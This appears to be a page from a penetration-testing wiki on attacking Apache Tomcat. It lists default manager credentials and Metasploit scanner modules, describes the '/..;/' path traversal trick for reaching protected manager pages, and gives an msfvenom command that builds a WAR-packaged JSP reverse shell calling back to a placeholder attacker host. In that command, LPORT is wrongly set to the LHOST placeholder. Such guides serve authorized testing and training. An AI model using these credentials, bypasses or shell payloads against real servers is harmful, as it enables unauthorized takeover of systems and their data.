Tomcat

Discovery

Typically Apache Tomcat runs on port 8080
Common Tomcat error:

Enumeration

Version Identification

You can find the version of Apache Tomcat by going to the /doc/ directory

Manager Files Location

Identifying the /manager and /host-manager directories is crucial. Their names may be altered so perform a directory brute force to locate them.

Username Enumeration

Apache Tomcate <6.0.0 username enumeration is possible through

msf> use auxiliary/scanner/http/tomcat_enum

Default Credentials

The /manager/html directory is particularly sensitive as it allows the upload and deployment of WAR files, which can lead to code execution. This directory is protected by basic HTTP authentication, with common credentials being:

admin:admin
tomcat:tomcat
admin:
admin:s3cr3t
tomcat:s3cr3t
admin:tomcat

These credentials can be tested using:

msf> use auxiliary/scanner/http/tomcat_mgr_login

Another notable directory is /manager/status, which displays the Tomcat and OS version, aiding in vulnerability identification.

Path Traversal Exploit

In some vulnerable configurations of Tomcat you can gain access to protected directories in Tomcat using the path: /..;/

So, for example, you might be able to access the Tomcat manager page by accessing: www.vulnerable.com/lalala/..;/manager/html

Another way to bypass protected paths using this trick is to access http://www.vulnerable.com/;param=value/manager/html

Remote Code Execution

If you have access to the Tomcat Web Application Manager, you can upload and deploy a .war file (execute code).

MSFVenom Reverse Shell

Create the war to deploy:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LHOST_IP> -f war -o revshell.war

Upload the revshell.war file and access to it (/revshell/):

Bind and reverse shell with tomcatWarDeployer.py

In some scenarios this doesn't work (for example old versions of sun)

Previous80,443 - Web Pentesting NextWordpress

Last updated 1 year ago